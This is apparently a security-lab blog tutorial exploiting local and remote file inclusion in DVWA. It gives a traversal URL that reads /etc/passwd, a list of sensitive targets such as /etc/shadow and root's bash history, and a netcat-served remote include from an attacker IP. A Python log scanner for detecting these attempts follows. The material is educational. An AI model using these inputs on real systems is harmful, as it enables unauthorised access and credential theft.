DVWA 1.9+: File Inclusion using Netcat as web server

Miguel Sampaio da Veiga
Published in Hacker Toolbelt
May 16, 2019

This is part 5 of the DVWA Lab, and in this part we’ll cover file inclusion. So what is file inclusion and why is it a big deal?

When a web application allows the user to supply input directly to file streams or to upload files, it opens an attack vector for executing malicious code. If the malicious file is already on the target machine, the attack is called Local File Inclusion (LFI). If the file is external, it’s called Remote File Inclusion (RFI).

This is one more article in the DVWA series. You can grab all articles here.

Local File Inclusion

Open your browser, enter the DVWA URL, log in and navigate to the ‘file inclusion’ page.

If we click the links file1.php, file2.php, file3.php and look at the generated URL, we can see that the filename of each page is inserted into it. Let’s tamper with the URL:

http://192.168.231.110/vulnerabilities/fi/?page=../../../../../etc/passwd

Remember to set the security level to low.

The browser rendered the page with the contents of passwd. We can pry into other interesting files:

  • /etc/issue
  • /proc/version
  • /etc/profile
  • /etc/passwd
  • /etc/shadow
  • /root/.bash_history
  • /var/log/dmessage
  • /var/mail/root
  • /var/spool/cron/crontabs/root

Remote File Inclusion

We’re going to try RFI on our target. First, let’s create a file to test:

$ nano rfi.php

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: netcat!

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
</head>
<body>
<h1>Fake DVWA page</h1>
<h2>Remote File Inclusion Test</h2>
</body>
</html>

We’re going to use the same method as before: first create the file with a corresponding header, then serve the file using Netcat as a simple web server:

# while true; do nc -l -p 80 < rfi.php; done;

Note the ‘#’. We’ll need root privileges to use port 80.

You can try the URL in your browser (http://your_kali_ip_address). Now, append this same URL to the DVWA address:

http://192.168.231.110/vulnerabilities/fi/?page=http://192.168.231.107/rfi.php

This is it. Target hacked.
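
Seen from the defending side, both requests above leave a clear trace in the web server's access log. The following is an added example, not code from the original article or from DVWA: it scans access-log lines for page= values that are not the expected file names, decoding repeated URL-encoding first. The log lines are constructed, and include.php in the allowlist is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# file1-3.php are the links named in the article; include.php is an assumed default.
ALLOWED = {"include.php", "file1.php", "file2.php", "file3.php"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)
# Constructed sample log lines (combined log format), using the article's URLs.
SAMPLE_LOG = [
    '192.168.231.107 - - [16/May/2019:10:00:01 +0000] "GET /vulnerabilities/fi/?page=file1.php HTTP/1.1" 200 1523',
    '192.168.231.107 - - [16/May/2019:10:00:09 +0000] "GET /vulnerabilities/fi/?page=../../../../../etc/passwd HTTP/1.1" 200 2911',
    '192.168.231.107 - - [16/May/2019:10:02:30 +0000] "GET /vulnerabilities/fi/?page=http://192.168.231.107/rfi.php HTTP/1.1" 200 1702',
    '192.168.231.107 - - [16/May/2019:10:03:12 +0000] "GET /vulnerabilities/fi/?page=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2911',
]

def fully_decode(value, rounds=5):
    """Undo repeated URL-encoding (%252f -> %2f -> /) so encoded values are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(page):
    """Return 'ok', 'lfi', 'rfi' or 'unexpected' for one page= value."""
    p = fully_decode(page).replace("\\", "/")
    if p in ALLOWED:
        return "ok"
    if SCHEME_RE.match(p) or p.startswith("//"):
        return "rfi"         # scheme-prefixed value: content fetched from elsewhere
    if ".." in p.split("/") or p.startswith("/"):
        return "lfi"         # directory traversal or absolute local path
    return "unexpected"      # not on the allowlist, worth a manual look

def scan(lines):
    """Yield (client_ip, verdict, decoded_value) for suspicious fi/ requests."""
    for line in lines:
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.endswith("/vulnerabilities/fi/"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("page", []):
            verdict = classify(raw)
            if verdict != "ok":
                yield line.split()[0], verdict, fully_decode(raw)

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allowlist comparison, applied inside the application before the include happens, is what closes the hole; the log scan only tells you that someone tried.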

Conclusion

In this article we’ve tackled File Inclusion vulnerabilities. Don’t miss the next article.
